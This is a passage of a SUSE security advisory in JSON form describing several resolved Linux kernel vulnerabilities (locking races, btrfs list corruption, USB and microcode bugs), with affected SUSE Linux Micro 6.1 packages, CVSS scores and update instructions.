"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n icc_put(path_b)\n mutex_lock(\u0026icc_lock);\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_del(...\n \u003cr = invalid pointer\u003e\n\nExample B:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n path_b = of_icc_get()\n of_icc_get_by_index()\n mutex_lock(\u0026icc_lock);\n path_find()\n path_init()\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_add_head(...\n \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-27005",
"url": "https://www.suse.com/security/cve/CVE-2024-27005"
},
{
"category": "external",
"summary": "SUSE Bug 1223800 for CVE-2024-27005",
"url": "https://bugzilla.suse.com/1223800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2024-27005"
},
{
"cve": "CVE-2024-42103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-42103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n [177.529][T2585409] ------------[ cut here ]------------\n [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1\n [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n [177.742][T2585409] PKRU: 55555554\n [177.748][T2585409] Call Trace:\n [177.753][T2585409] \u003cTASK\u003e\n [177.759][T2585409] ? __die_body.cold+0x19/0x27\n [177.766][T2585409] ? die+0x2e/0x50\n [177.772][T2585409] ? do_trap+0x1ea/0x2d0\n [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.788][T2585409] ? do_error_trap+0xa3/0x160\n [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.805][T2585409] ? handle_invalid_op+0x2c/0x40\n [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.820][T2585409] ? exc_invalid_op+0x2d/0x40\n [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20\n [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-42103",
"url": "https://www.suse.com/security/cve/CVE-2024-42103"
},
{
"category": "external",
"summary": "SUSE Bug 1228490 for CVE-2024-42103",
"url": "https://bugzilla.suse.com/1228490"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2024-42103"
},
{
"cve": "CVE-2024-53070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: fix fault at system suspend if device was already runtime suspended\n\nIf the device was already runtime suspended then during system suspend\nwe cannot access the device registers else it will crash.\n\nAlso we cannot access any registers after dwc3_core_exit() on some\nplatforms so move the dwc3_enable_susphy() call to the top.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53070",
"url": "https://www.suse.com/security/cve/CVE-2024-53070"
},
{
"category": "external",
"summary": "SUSE Bug 1233563 for CVE-2024-53070",
"url": "https://bugzilla.suse.com/1233563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2024-53070"
},
{
"cve": "CVE-2024-53149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: glink: fix off-by-one in connector_status\n\nUCSI connector\u0027s indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS.\nCorrect the condition in the pmic_glink_ucsi_connector_status()\ncallback, fixing Type-C orientation reporting for the third USB-C\nconnector.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53149",
"url": "https://www.suse.com/security/cve/CVE-2024-53149"
},
{
"category": "external",
"summary": "SUSE Bug 1234842 for CVE-2024-53149",
"url": "https://bugzilla.suse.com/1234842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2024-53149"
},
{
"cve": "CVE-2025-22047",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22047"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value\n\nWhen verify_sha256_digest() fails, __apply_microcode_amd() should propagate\nthe failure by returning false (and not -1 which is promoted to true).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22047",
"url": "https://www.suse.com/security/cve/CVE-2025-22047"
},
{
"category": "external",
"summary": "SUSE Bug 1241437 for CVE-2025-22047",
"url": "https://bugzilla.suse.com/1241437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
